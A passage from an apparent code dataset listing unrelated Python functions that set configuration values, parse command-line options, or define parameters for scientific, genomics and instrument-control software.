args.set == \"password\":\n put_config_value(\"password\", args.value)\n elif args.set == \"username\":\n put_config_value(\"username\", args.value)\n else:\n print(\"Invalid option\")", "def func_update_arguments(self, arg_raw ):\n\n arg_raw.prog = \"DISCASM\"\n arg_raw.description = \"extracts genome-aligned discordant and unmapped reads, and de novo assembles them\"\n\n arg_raw.add_argument(\"--chimeric_junctions\", dest=\"chimeric_junctions\", required=True, help=\"STAR Chimeric.out.junction file\")\n arg_raw.add_argument(\"--aligned_bam\", dest=\"aligned_bam_filename\", required=False, help=\"aligned bam file from your favorite rna-seq alignment tool\")\n arg_raw.add_argument(\"--left_fq\", dest=\"left_fq_filename\", required=True, help=\"left fastq file\")\n arg_raw.add_argument(\"--right_fq\", dest=\"right_fq_filename\", required=True, help=\"right fastq file\")\n arg_raw.add_argument(\"--out_dir\", dest=\"str_out_dir\", required=True, help=\"output directory\")\n arg_raw.add_argument(\"--denovo_assembler\", dest=\"denovo_assembler\", required=True, help=\"de novo assembly method: Trinity|Oases|OasesMultiK\")\n arg_raw.add_argument(\"--add_trinity_params\", dest=\"add_trinity_params\", required=False, help=\"any additional parameters to pass on to Trinity if Trinity is the chosen assembler.\")\n arg_raw.add_argument(\"--normalize_reads\", default=False, action='store_true', help='perform in silico normalization prior to de novo assembly')\n\n return(arg_raw)", "def updateParameters(self, parameters):\r\n\r\n ##if parameters[0].altered:\r\n ## in_nc_file = parameters[0].valueAsText\r\n ##\r\n ## # Set output workspace and default name\r\n ## workspace = os.path.dirname(in_nc_file)\r\n ## parameters[1].value = os.path.join(workspace, in_nc_file + '.prj')\r", "def setSorConstant(*argv):", "def setCmsGenParameters(self, **args):\n self.cmsGenNode.applicationControls.update(args)\n return", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def cmd_config__set(args):\n\n settings = {}\n for pair in args.keyvalues:\n key, value = pair.split(\"=\", 1)\n settings[key] = value\n remote.update_config(_get_current_project_name(), settings)", "def args(self, value):\n # obtener la linea de comandos convertida a dict, eliminando algunos\n self._args = self.clean_command_line(value)\n\n # obtener el archivo de configuracion\n config = self.get_config()\n\n # Cliente actual, de los parametros, este siempre tiene precedencia\n client = self._args.get('client')\n\n # Fallback lo saco de la configuracion, y si tampoco esta es un error\n if not client:\n client = config.get('client')\n self._args['client'] = client\n\n # si aca no tengo definido el cliente termino con error\n if not client:\n msg.err('Need -c option (client name). Process aborted')\n\n # obtener la configuracion para el cliente actual.\n client_config = config.get(client, {})\n\n # Mezclo argumentos de linea de comandos con configuracion\n # la linea de comandos tiene precedencia\n for item in client_config or []:\n if item not in self._args:\n self._args[item] = client_config.get(item)\n\n # agregar valores por defecto si no estan definidos\n self.add_default_values()\n\n # si aca no tengo definido la aplicacion default termino con error\n if not self._args.get('defapp'):\n msg.err('Need --defapp option (default application). '\n 'Process aborted')\n\n self.save_config()", "def update(self, arguments):\n puts_err(colored.red(\"Not implemented!\"))", "def parseArg(self, c):\n\n\t\trocks.app.Application.parseArg(self, c)\n\n\t\tif c[0] in ('--conf', '-c'):\n\t\t\tself.config.setFile(c[1])\n\t\t\tself.config.parse()\n\t\telif c[0] in ('--master',):\n\t\t\tself.masters = [rocks.service411.Master(c[1])]\n\t\telif c[0] in ('--shared',):\n\t\t\tself.shared_filename = c[1]\n\t\telif c[0] in ('--pub',):\n\t\t\tself.pub_filename = c[1]\n\t\telif c[0] == \"--comment\":\n\t\t\tself.comment = c[1]\n\t\telif c[0] == \"--all\":\n\t\t\tself.getall = 1\n\t\telif c[0] in (\"--local\", \"--file\"):\n\t\t\tself.doFile = 1\n\t\telif c[0] in (\"-v\", \"--verbose\"):\n\t\t\tself.verbose += 1", "def setInfo(*args):", "def set_global_attributes(ds):\n ds.title = \"LPDM CO2 Concentration Footprints\"\n ds.summary = (\"Gridded CO2 concentration footprints from the output \"\n \"of the Lagrangian Particle Dispersion model \"\n \"described in Uliasz 1994.\")\n ds.Conventions = \"CF-1.6 ACDD-1.3\"\n ds.history = (\"{date:{acdd_format}} {user:s} \"\n \"created by {progname:s}\").format(\n date=RUN_DATE, user=os.environ[\"USER\"],\n acdd_format=ACDD_DATE,\n progname=sys.argv[0])\n ds.source = (\"Gridded outputs from LPDM v?.?.? \"\n \"written by Uliasz et al. and modified by Lauvaux\")\n ds.standard_name_vocabulary = \"CF Standard Name Table v32\"\n ds.date_created = \"{date:{acdd_format}}\".format(\n date=RUN_DATE, acdd_format=ACDD_DATE)\n ds.creator_name = \"Daniel Wesloh, Thomas Lauvaux\"\n ds.creator_institution = (\n \"The Pennsylvania State University \"\n \"Department of Meteorology and Atmospheric Science\")\n ds.date_modified = \"{date:{acdd_format}}\".format(\n date=RUN_DATE, acdd_format=ACDD_DATE)\n ds.date_metadata_modified = \"{date:{acdd_format}}\".format(\n date=RUN_DATE, acdd_format=ACDD_DATE)\n ds.product_version = \"Py_v1.0.0\"\n ds.references = \"\"\"Uliasz, M. 1994. Lagrangian particle dispersion modeling in mesoscale applications. Environ Model: Comput Methods and Softw for Simulat Environ Pollut and its Adverse Effects (CMP) 2 : 71-.\"\"\"\n\n ds.geospatial_vertical_min = 0\n ds.geospatial_vertical_max = CLOSE_TO_GROUND\n ds.geospatial_vertical_positive = \"up\"\n ds.geospatial_vertical_units = \"km AGL\"\n # Kind of a cross between Grid and Trajectory\n # Grid covers the first and last two axes;\n # trajectory covers third-to-last\n ds.cdm_data_type = \"Grid\"\n\n ds.institution = ds.creator_institution", "def updateData(self, *args):\n # if self.move_next_option == \"R\":\n # self.restSampling()\n # elif self.move_next_option == \"A\":\n # self.addExtra()\n # else:\n # self.continueReview()\n for name, value in self.parameter_inputs.items():\n self.parameters[name] = value.value\n # directly change the value of class variables\n logMsg((\"update settings: \", self.ml_classifier_cls, name, value.value))\n setattr(self.ml_classifier_cls, name, value.value)\n\n pass", "def option_check_and_set(args, params):\n# Error out if initial sequence files are missing and merging is seleceted. \n\n# Set OTU clustering criteria:\n if (args.filter or args.table_workflow):\n if params['id_thresh'] is None:\n params['id_thresh'] = input('[Cluster] Enter OTU clustering threshold (default = 0.97): ')\n \n if params['max_ee_rate'] is None:\n params['max_ee_rate'] = input('[Filter] Max Errors (~.5-1 per 100bp or 1-3 per 250bp): ')\n \n if params['min_len'] is None:\n params['min_len']= input('[Cutadapt] Enter minimum sequence length: ')\n \n if params['max_len'] is None:\n params['max_len']= input('[Cutadapt] Enter maximum sequence length: ')\n\n\n if args.cluster:\n if params['id_thresh'] is None:\n params['id_thresh'] = input('[Cluster] Enter OTU clustering threshold (default = 0.97): ')\n \n\n\n# Set cutadapt options:\n if (args.cutadapt):\n if params['fwd_primer'] is None:\n params['fwd_primer'] = input('[Cutadapt] Enter forward primer: ')\n \n if params['rev_primer'] is None:\n params['rev_primer'] = input('[Cutadapt] Enter reverse primer: ')\n \n return params", "def config( **kwargs ):", "def do_project_update(cs, args):\n raise NotImplementedError", "def _ApplyFlags(cls, config_values, flag_values):\n super()._ApplyFlags(config_values, flag_values)\n if flag_values['cloud_spanner_config'].present:\n config_values['config'] = flag_values.cloud_spanner_config\n if flag_values['cloud_spanner_nodes'].present:\n config_values['nodes'] = flag_values.cloud_spanner_nodes\n if flag_values['cloud_spanner_project'].present:\n config_values['project'] = flag_values.cloud_spanner_project", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def do_config(self, args):\n self.config_command.cmdloop(\"Enter to config mode\")", "def setGravity(*argv):", "def runCase(foamCase, baseCase, parameters, volumeParameters, controlParameters, options=dict(parallel=False, overwrite=True)):\n print('\\n==============================================================\\nRunning ' + foamCase + '\\n==============================================================\\n')\n \n status = checkIfExist(foamCase)\n if status != 2:\n print(foamCase + ' already exists. Continue with next case ...' )\n if status ==1:\n return 2 # for when the case is still running \n else:\n return 1 # for when the case has finished running\n else:\n createCase(foamCase, baseCase)\n # get old parameters. \n parameterFile = 'parameters'\n #for parameter in parameters.keys():\n # currentValue = readInput(parameterFile, parameter, foamCase)\n # parameters[parameter]=currentValue\n\n # Values to be changed\n print('\\n\\nChanging section\\n\\n\\t\\tGeometry') \n for parameter in parameters.keys():\n changeInput(parameter, parameters[parameter], parameterFile, foamCase)\n\n print('\\n\\t\\tVolumetric flow parameters')\n for volumeParameter in volumeParameters.keys():\n writeParameter = volumeParameter.replace('Q', 'U')\n if volumeParameter=='QNozzleIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], angle = 5)\n elif volumeParameter=='QShieldIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2])\n elif volumeParameter=='QShieldOut':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], direction=[0, 1, 0])\n print(velocity)\n changeInput(volumeParameter, volumeParameters[volumeParameter][0], parameterFile, foamCase) # for visual interpretation in parameters file\n changeInput(writeParameter, velocity, 'U', foamCase) # for the inflow condition\n \n print('\\n\\t\\tControl parameters ')\n for controlParameter in controlParameters.keys():\n changeInput(controlParameter, controlParameters[controlParameter], 'controlDict', foamCase)\n \n\n print('\\n\\t\\tRunning section')\n #steps \n steps =[\n 'blockMesh',\n 'extrudeMesh',\n 'changeDictionary',\n 'createPatch',\n 'renumberMesh',\n 'checkMesh',\n 'prepare',\n 'run',\n ]\n \n checkResult = checkDicts(steps, foamCase=foamCase)\n if checkResult==1:\n print('\\n\\t\\tContinue to the next case... \\n')\n return 2\n else:\n runFile = foamCase + '/Allrun.sh'\n createOptimizeRunFile(runFile, steps, options, parameters)\n print('\\t\\tRunning....')\n os.system(runFile) # actually run the file\n print('\\t\\tFinished run....')\n return 0", "def _update_params(self, *args, **kwargs):\n\n \n # Get old param dict config.\n old_config = self._param_dict.get_config()\n \n # Issue display commands and parse results.\n timeout = kwargs.get('timeout', SBE37_TIMEOUT)\n self._do_cmd_resp('ds',timeout=timeout)\n self._do_cmd_resp('dc',timeout=timeout)\n \n # Get new param dict config. If it differs from the old config,\n # tell driver superclass to publish a config change event.\n new_config = self._param_dict.get_config()\n if new_config != old_config:\n self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)", "def SetChassisMode(self, *args, **kwargs):\n payload = {}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 1)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"setChassisMode\", payload=payload, response_object=None)", "def _two_arg_settings(self, args, invalids, master):\n \n for arg in args:\n if arg[0] not in invalids:\n master[arg[0]] = arg[1]", "def __init__(self, *args, **kwargs):\n self._rcParams = {}\n self.update(*args, **kwargs)", "def _set_function_parameters(self, p_args=None) -> bool:\n if self.get_type() == self.C_UNIT_CONV_LENGTH:\n self.units = {\n 'fm' : 1000000000000000,\n 'pm' : 1000000000000,\n 'nm' : 1000000000,\n 'um' : 1000000,\n 'mm' : 1000,\n 'cm' : 100,\n 'm' : 1.0,\n 'dam' : 0.1,\n 'hm' : 0.01,\n 'km' : 0.001,\n 'Mm' : 0.000001,\n 'Gm' : 0.000000001,\n 'Tm' : 0.000000000001,\n 'Pm' : 0.000000000000001,\n 'inch' : 39.3701,\n 'ft' : 3.28084,\n 'yd' : 1.09361,\n 'mi' : 0.000621371,\n 'nautMi' : 1.0/1852.0,\n 'lightYear' : 1.0/(9.4607304725808*(10**15))\n }\n \n elif self.get_type() == self.C_UNIT_CONV_PRESSURE:\n self.units = {\n 'Pa' : 100000.0,\n 'hPa' : 1000.0,\n 'kPa' : 100.0,\n 'MPa' : 0.1,\n 'bar' : 1.0,\n 'mbar' : 1000.0,\n 'ubar' : 1000000.0,\n 'kgcm2' : 1.01972,\n 'atm' : 0.986923,\n 'mmHg' : 750.062,\n 'mmH2O' : 10197.162129779,\n 'mH2O' : 10.197162129779,\n 'ftH2O' : 33.455256555148,\n 'inH2O' : 401.865,\n 'inHg' : 29.53,\n 'psi' : 14.5038\n }\n \n elif self.get_type() == self.C_UNIT_CONV_CURRENT:\n self.units = {\n 'fA' : 1000000000000000,\n 'pA' : 1000000000000,\n 'nA' : 1000000000,\n 'uA' : 1000000,\n 'mA' : 1000,\n 'cA' : 100,\n 'A' : 1.0,\n 'daA' : 0.1,\n 'hA' : 0.01,\n 'kA' : 0.001,\n 'MA' : 0.000001,\n 'GA' : 0.000000001,\n 'TA' : 0.000000000001,\n 'PA' : 0.000000000000001,\n }\n \n elif self.get_type() == self.C_UNIT_CONV_FORCE:\n self.units = {\n 'fN' : 1000000000000000,\n 'pN' : 1000000000000,\n 'nN' : 1000000000,\n 'uN' : 1000000,\n 'mN' : 1000,\n 'cN' : 100,\n 'N' : 1.0,\n 'daN' : 0.1,\n 'hN' : 0.01,\n 'kN' : 0.001,\n 'MN' : 0.000001,\n 'GN' : 0.000000001,\n 'TN' : 0.000000000001,\n 'PN' : 0.000000000000001,\n 'shortTonF' : 1.124045e-4,\n 'longTonF' : 1.003611e-4,\n 'kipf' : 2.248089e-4,\n 'lbf' : 2.248089431e-1,\n 'ozf' : 3.5969430896,\n 'pdf' : 7.2330138512,\n 'gf' : 1.019716213e+2,\n 'kgf' : 1.019716213e-1,\n 'dyn' : 1e+5,\n 'J/m' : 1.0,\n 'J/cm' : 100.0\n }\n \n elif self.get_type() == self.C_UNIT_CONV_POWER:\n self.units = {\n 'fW' : 1000000000000000*1e3,\n 'pW' : 1000000000000*1e3,\n 'nW' : 1000000000*1e3,\n 'uW' : 1000000*1e3,\n 'mW' : 1000*1e3,\n 'cW' : 100*1e3,\n 'W' : 1.0*1e3,\n 'daW' : 0.1*1e3,\n 'hW' : 0.01*1e3,\n 'kW' : 0.001*1e3,\n 'MW' : 0.000001*1e3,\n 'GW' : 0.000000001*1e3,\n 'TW' : 0.000000000001*1e3,\n 'PW' : 0.000000000000001*1e3,\n 'BTU/hr' : 3412.14,\n 'BTU/min' : 56.869,\n 'BTU/sec' : 0.94781666666,\n 'cal/sec' : 238.85,\n 'cal/min' : 238.85*60,\n 'cal/hr' : 238.85*60*60,\n 'erg/sec' : 10e9,\n 'erg/min' : 10e9*60,\n 'erg/hr' : 10e9*60*60,\n 'ftlb/sec' : 737.56,\n 'kCal/sec' : 0.24,\n 'kCal/min' : 0.24*60,\n 'kCal/hr' : 0.24*60*60,\n 'VA' : 1e3,\n 'metric_ton_ref' : 0.259,\n 'US_ton_ref' : 0.2843451361,\n 'J/sec' : 1000.0,\n 'J/min' : 1000.0*60,\n 'J/hr' : 1000.0*60*60,\n 'kgf-m/sec' : 101.97162129779,\n 'hp_mech' : 1.3410220888,\n 'hp_ele' : 1.3404825737,\n 'hp_metric' : 1.359621617304\n }\n \n elif self.get_type() == self.C_UNIT_CONV_MASS:\n self.units = {\n 'fg' : 1000000000000000*1e3,\n 'pg' : 1000000000000*1e3,\n 'ng' : 1000000000*1e3,\n 'ug' : 1000000*1e3,\n 'mg' : 1000*1e3,\n 'cg' : 100*1e3,\n 'g' : 1.0*1e3,\n 'dag' : 0.1*1e3,\n 'hg' : 0.01*1e3,\n 'kg' : 0.001*1e3,\n 'Mg' : 0.000001*1e3,\n 'Gg' : 0.000000001*1e3,\n 'Tg' : 0.000000000001*1e3,\n 'Pg' : 0.000000000000001*1e3,\n 'metricTon' : 1.0/1000.0,\n 'shortTon' : 1.0/907.185,\n 'longTon' : 1.0/1016.047,\n 'slug' : 1.0/14.5939029,\n 'lb' : 2.2046226218,\n 'oz' : 35.274,\n 'grain' : 2.2046226218*7000.0\n }\n \n elif self.get_type() == self.C_UNIT_CONV_TIME:\n self.units = {\n 'fs' : 1000000000000000,\n 'ps' : 1000000000000,\n 'ns' : 1000000000,\n 'us' : 1000000,\n 'ms' : 1000,\n 'cs' : 100,\n 's' : 1.0,\n 'das' : 0.1,\n 'hs' : 0.01,\n 'ks' : 0.001,\n 'Ms' : 0.000001,\n 'Gs' : 0.000000001,\n 'Ts' : 0.000000000001,\n 'Ps' : 0.000000000000001,\n 'min' : 1.0/60.0,\n 'hr' : 1.0/60.0/60.0,\n 'day' : 1.0/60.0/60.0/24.0\n }\n \n elif self.get_type() == self.C_UNIT_CONV_TEMPERATURE:\n self.units = {\n 'K' : 'Kelvin',\n 'R' : 'Rankine',\n 'F' : 'Fahrenheit',\n 'C' : 'Celcius',\n }\n \n if self.units.get(self._unit_in) is not None and self.units.get(self._unit_out) is not None:\n return True\n else:\n raise NotImplementedError('The input and/or output units do not exist!')", "def updateParameters(self, parameters):", "def _handle_common_options(ctx, conpath=None, force=None, species=None):\n\n config = configuration.Config()\n\n ## Update the config or look in places where it may exist\n if conpath:\n config.reload(conpath)\n\n if force is not None:\n config.config['overwrite'] = force\n\n if species is not None:\n config.config['species'] = species\n\n ctx.ensure_object(dict)\n ctx.obj['config'] = config\n\n return ctx", "def update(self, args):\n pass", "def setAttributesFromCmdLine(self):\n try:\n opts, args = getopt.getopt(sys.argv[1:],\n \"hVv:i:\",\n [\"help\", \"version\", \"verbose=\",\n \"proj1=\",\n \"proj2=\",\n \"step=\",\n \"samples=\",\n \"fcln=\",\n \"dict=\",\n \"schdlr=\",\n \"queue=\",\n \"enz=\",\n \"dmxmet=\",\n \"subst=\",\n \"ensubst=\",\n \"adp=\",\n \"errtol=\",\n \"minovl=\",\n \"minrl=\",\n \"minq=\",\n \"maxNp=\",\n \"ref=\",\n \"jgid=\",\n \"rat=\",\n \"mdp=\",\n \"mgq=\",\n \"mnfg=\",\n \"mffg=\",\n \"mnnc=\",\n \"mfnc=\",\n \"fam=\",\n \"mvq=\",\n \"xlssf=\",\n \"tmpd=\",\n \"jvmXms=\",\n \"jvmXmx=\",\n \"queue2=\",\n \"knowni=\",\n \"known=\",\n \"force\",\n \"pird=\",\n \"resou=\",\n \"rmvb\"])\n except getopt.GetoptError as err:\n sys.stderr.write(\"%s\\n\\n\" % str(err))\n # self.help()\n sys.exit(2)\n for o, a in opts:\n if o == \"-h\" or o == \"--help\":\n self.help()\n sys.exit(0)\n elif o == \"-V\" or o == \"--version\":\n self.version()\n sys.exit(0)\n elif o == \"-v\" or o == \"--verbose\":\n self.verbose = int(a)\n elif o == \"--proj1\":\n self.project1Id = a\n elif o == \"--proj2\":\n self.project2Id = a\n elif o == \"--schdlr\":\n self.scheduler = a\n elif o == \"--queue\":\n self.queue = a\n elif o == \"--resou\":\n self.lResources = a.split()\n elif o == \"--rmvb\":\n self.rmvBash = True\n elif o == \"--step\":\n self.lSteps = [a]\n elif o == \"--samples\":\n self.samplesFile = a\n elif o == \"--fcln\":\n self.fclnToKeep = a\n elif o == \"--pird\":\n self.pathToInReadsDir = a\n elif o == \"--enz\":\n self.enzyme = a\n elif o == \"--dmxmet\":\n self.dmxMethod = a\n elif o == \"--subst\":\n self.nbSubstsAllowedDemult = int(a)\n elif o == \"--ensubst\":\n self.enforceSubst = a\n elif o == \"--adp\":\n self.adpFile = a\n elif o == \"--errtol\":\n self.errTol = float(a)\n elif o == \"--minovl\":\n self.minOvl = int(a)\n elif o == \"--minrl\":\n self.minReadLen = int(a)\n elif o == \"--minq\":\n self.minQual = int(a)\n elif o == \"--maxNp\":\n self.maxNPerc = float(a)\n elif o == \"--ref\":\n self.pathToPrefixRefGenome = a\n elif o == \"--dict\":\n self.dictFile = a\n elif o == \"--jgid\":\n self.jointGenoId = a\n elif o == \"--rat\":\n self.restrictAllelesTo = a\n elif o == \"--mdp\":\n self.minDp = int(a)\n elif o == \"--mgq\":\n self.minGq = int(a)\n elif o == \"--mnfg\":\n self.maxNbFilterGenos = int(a)\n elif o == \"--mffg\":\n self.maxFracFilterGenos = float(a)\n elif o == \"--mnnc\":\n self.maxNbNocallGenos = int(a)\n elif o == \"--mfnc\":\n self.maxFracNocallGenos = float(a)\n elif o == \"--fam\":\n self.famFile = a\n elif o == \"--mvq\":\n self.mendelianViolationQualThreshold = int(a)\n elif o == \"--xlssf\":\n self.excludeSampleFile = a\n elif o == \"--tmpd\":\n self.tmpDir = a\n elif o == \"--jvmXms\":\n self.jvmXms = a\n elif o == \"--jvmXmx\":\n self.jvmXmx = a\n elif o == \"--queue2\":\n self.queue2 = a\n elif o == \"--knowni\":\n self.knownIndelsFile = a\n elif o == \"--known\":\n self.knownFile = a\n elif o == \"--force\":\n self.forceRerunSteps = True\n else:\n assert False, \"invalid option\"", "def do_it(args):\n\n #force = args.force\n #testing = args.testing\n #verbose = args.verbose\n #regions = args.regions\n\n # XXX WORKING HERE", "def setOptions(args):\n obs_dir = PATH_TO_OBS + args.loc[0] + '/Drifter/'\n\n if args.debug:\n print 'looking for drifter directory...'\n\n if not osp.exists(obs_dir) or not osp.isdir(obs_dir):\n sys.exit('drifter directory not found.')\n elif args.debug:\n print 'drifter directory successfully found.'\n print '\\tgathering all files...'\n\n matfiles = [obs_dir + file for file in os.listdir(obs_dir)]\n if len(matfiles) == 0:\n sys.exit('no files found in drifter directory.')\n elif args.debug:\n print '\\tall drifter files found.'\n\n if args.debug:\n print 'looking for fvcom directory(s)...'\n\n if args.bfric:\n path2sim = PATH_TO_SIM + 'BFRIC_' + args.bfric + '/'\n\n # locate given fvcom file\n if args.dir:\n sim_path = [path2sim + args.loc[0] + '/' + args.dir[0]]\n if not osp.exists(sim_path[0]) or not osp.isdir(sim_path[0]):\n sys.exit('the directory {} could not be located.'.format(sim_path))\n elif args.debug:\n print '\\tfvcom directory found. \\n\\tloading nc file...'\n\n sim_path[0] = sim_path[0]+'/output/subdomain_'+args.loc[0]+'1_0001.nc'\n if not osp.exists(sim_path[0]) or not osp.isfile(sim_path[0]):\n sys.exit('fvcom file not in directory.')\n elif args.debug:\n print '\\tfvcom file successfully located.'\n else:\n dirs = os.listdir(path2sim + args.loc[0] + '/')\n sim_path = [path2sim + args.loc[0] + '/' + file + \\\n '/output/subdomain_' + args.loc[0] + '1_0001.nc' for file in dirs]\n\n for path in sim_path:\n if not osp.exists(path) or not osp.isfile(path):\n sys.exit('fvcom file {} is not found.'.format(path))\n sim_path.remove(path)\n\n if len(sim_path) == 0:\n sys.exit('no ncfiles found in directory.')\n elif args.debug:\n print '\\tall ncdirectories found.'\n\n return args.loc[0], sim_path, obs_dir, matfiles", "def updateParameters(self, parameters):\n if parameters[0].value and parameters[3].value:\n if (parameters[0].altered or paramaters[3].altered) and not parameters[4].altered:\n layer = parameters[0].valueAsText;\n desc = arcpy.Describe(layer)\n name = desc.file;\n type = parameters[3].valueAsText;\n char = type[:1];\n if (char != 'U'):\n if (char != 'C'):\n char = 'C' + char; #Output _C + first letter of type unless it is U\n else:\n char = 'CT'; # Unless it is C, then it is CT... \n #Update name accordingly\n resulttmp = \"%WORKSPACE%\\\\\" + name + \"_\" + char; \n parameters[4].value = resulttmp.replace(\".\",\"\"); #Remove illegal characters\n return", "def setCSEParameters(csi:str, ri:str, rn:str) -> None:\n\t\t\tCSE.cseCsi = csi\n\t\t\tConfiguration.set('cse.csi', csi)\n\t\t\tCSE.cseRi = ri\n\t\t\tConfiguration.set('cse.ri', ri)\n\t\t\tCSE.cseRn = rn\n\t\t\tConfiguration.set('cse.rn', rn)", "def set_params(self, *arg):\n pass", "def do(self, argin):\n component_manager = self.target\n component_manager.configure(argin)\n return (ResultCode.OK, \"Configure command completed OK\")", "def change(self, ids, **kwargs):\n args = {}\n for key, value in kwargs.iteritems():\n argument = make_rpc_name(key)\n (arg, val) = argument_value_convert('torrent-set'\n , argument, value, self.rpc_version)\n args[arg] = val\n\n if len(args) > 0:\n self._request('torrent-set', args, ids, True)\n else:\n ValueError(\"No arguments to set\")", "def update(*args):", "def set_readonly_values(self, *args, **kwargs):\n # Let's give it a try in unknown state\n if (self.get_current_state() != ProtocolState.COMMAND):\n raise InstrumentProtocolException(\"Not in command state. Unable to set read-only params\")\n\n self._go_to_root_menu()\n self._update_params()\n\n for param in self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY):\n if not Parameter.has(param):\n raise InstrumentParameterException()\n\n self._go_to_root_menu()\n # Only try to change them if they arent set right as it is\n log.trace(\"Setting read-only parameter: %s, current paramdict value: %s, init val: %s\",\n param, self._param_dict.get(param),\n self._param_dict.get_init_value(param))\n if (self._param_dict.get(param) != self._param_dict.get_init_value(param)):\n if (param == Parameter.METADATA_POWERUP):\n self._navigate(SubMenu.METADATA_POWERUP)\n result = self._do_cmd_resp(Command.DIRECT_SET, (1+ int(self._param_dict.get_init_value(param))),\n expected_prompt=Prompt.CHANGE_PARAM_MENU)\n if not result:\n raise InstrumentParameterException(\"Could not set param %s\" % param)\n \n self._go_to_root_menu() \n \n elif (param == Parameter.METADATA_RESTART):\n self._navigate(SubMenu.METADATA_RESTART)\n result = self._do_cmd_resp(Command.DIRECT_SET, (1 + int(self._param_dict.get_init_value(param))),\n expected_prompt=Prompt.CHANGE_PARAM_MENU)\n if not result:\n raise InstrumentParameterException(\"Could not set param %s\" % param)\n \n self._go_to_root_menu()\n \n elif (param == Parameter.VERBOSE):\n self._navigate(SubMenu.VERBOSE)\n result = self._do_cmd_resp(Command.DIRECT_SET, self._param_dict.get_init_value(param),\n expected_prompt=Prompt.CHANGE_PARAM_MENU)\n if not result:\n raise InstrumentParameterException(\"Could not set param %s\" % param)\n \n self._go_to_root_menu() \n \n elif (param == Parameter.EH_ISOLATION_AMP_POWER):\n result = self._navigate(SubMenu.EH_ISOLATION_AMP_POWER)\n while not result:\n result = self._navigate(SubMenu.EH_ISOLATION_AMP_POWER)\n \n elif (param == Parameter.HYDROGEN_POWER):\n result = self._navigate(SubMenu.HYDROGEN_POWER)\n while not result:\n result = self._navigate(SubMenu.HYDROGEN_POWER)\n \n elif (param == Parameter.INST_AMP_POWER):\n result = self._navigate(SubMenu.INST_AMP_POWER)\n while not result:\n result = self._navigate(SubMenu.INST_AMP_POWER)\n \n elif (param == Parameter.REFERENCE_TEMP_POWER):\n result = self._navigate(SubMenu.REFERENCE_TEMP_POWER)\n while not result:\n result = self._navigate(SubMenu.REFERENCE_TEMP_POWER)\n \n elif (param == Parameter.RES_SENSOR_POWER):\n result = self._navigate(SubMenu.RES_SENSOR_POWER)\n while not result:\n result = self._navigate(SubMenu.RES_SENSOR_POWER)\n \n # re-sync with param dict?\n self._go_to_root_menu()\n self._update_params()\n \n # Should be good by now, but let's double check just to be safe\n for param in self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY):\n if (param == Parameter.VERBOSE):\n continue\n if (self._param_dict.get(param) != self._param_dict.get_init_value(param)):\n raise InstrumentProtocolException(\"Could not set default values!\")", "def setParameters(self, mu=1, k=10, c_a=1.1, c_r=0.5, epsilon=1e-20, **ukwargs):\n\t\tself.mu, self.k, self.c_a, self.c_r, self.epsilon = mu, k, c_a, c_r, epsilon\n\t\tif ukwargs: logger.info('Unused arguments: %s' % (ukwargs))", "def do_update(cs, args):\n opts = {}\n opts['memory'] = args.memory\n opts['cpu'] = args.cpu\n opts['name'] = args.name\n if 'auto_heal' in args and args.auto_heal:\n opts['auto_heal'] = True\n if 'no_auto_heal' in args and args.no_auto_heal:\n opts['auto_heal'] = False\n opts = zun_utils.remove_null_parms(**opts)\n if not opts:\n raise exc.CommandError(\"You must update at least one property\")\n container = cs.containers.update(args.container, **opts)\n _show_container(container)", "def _apply_params(self):\n config = self.get_startup_config()\n # Pass true to _set_params so we know these are startup values\n self._set_params(config, True)", "def set(self, opts, popsize=None, ccovfac=1, verbose=True):\r\n\r\n alpha_cc = 1.0 # cc-correction for mueff, was zero before\r\n\r\n def cone(df, mu, N, alphacov=2.0):\r\n \"\"\"rank one update learning rate, ``df`` is disregarded and obsolete, reduce alphacov on noisy problems, say to 0.5\"\"\"\r\n return alphacov / ((N + 1.3)**2 + mu)\r\n\r\n def cmu(df, mu, alphamu=0.0, alphacov=2.0):\r\n \"\"\"rank mu learning rate, disregarding the constrant cmu <= 1 - cone\"\"\"\r\n c = alphacov * (alphamu + mu - 2 + 1/mu) / ((N + 2)**2 + alphacov * mu / 2)\r\n # c = alphacov * (alphamu + mu - 2 + 1/mu) / (2 * (N + 2)**1.5 + alphacov * mu / 2)\r\n # print 'cmu =', c\r\n return c\r\n\r\n def conedf(df, mu, N):\r\n \"\"\"used for computing separable learning rate\"\"\"\r\n return 1. / (df + 2.*sqrt(df) + float(mu)/N)\r\n\r\n def cmudf(df, mu, alphamu):\r\n \"\"\"used for computing separable learning rate\"\"\"\r\n return (alphamu + mu - 2. + 1./mu) / (df + 4.*sqrt(df) + mu/2.)\r\n\r\n sp = self\r\n N = sp.N\r\n if popsize:\r\n opts.evalall({'N':N, 'popsize':popsize})\r\n else:\r\n popsize = opts.evalall({'N':N})['popsize'] # the default popsize is computed in Options()\r\n sp.popsize = popsize\r\n if opts['CMA_mirrors'] < 0.5:\r\n sp.lam_mirr = int(0.5 + opts['CMA_mirrors'] * popsize)\r\n elif opts['CMA_mirrors'] > 1:\r\n sp.lam_mirr = int(0.5 + opts['CMA_mirrors'])\r\n else:\r\n sp.lam_mirr = int(0.5 + 0.16 * min((popsize, 2 * N + 2)) + 0.29) # 0.158650... * popsize is optimal\r\n # lam = arange(2,22)\r\n # mirr = 0.16 + 0.29/lam\r\n # print(lam); print([int(0.5 + l) for l in mirr*lam])\r\n # [ 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21]\r\n # [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 4]\r\n\r\n 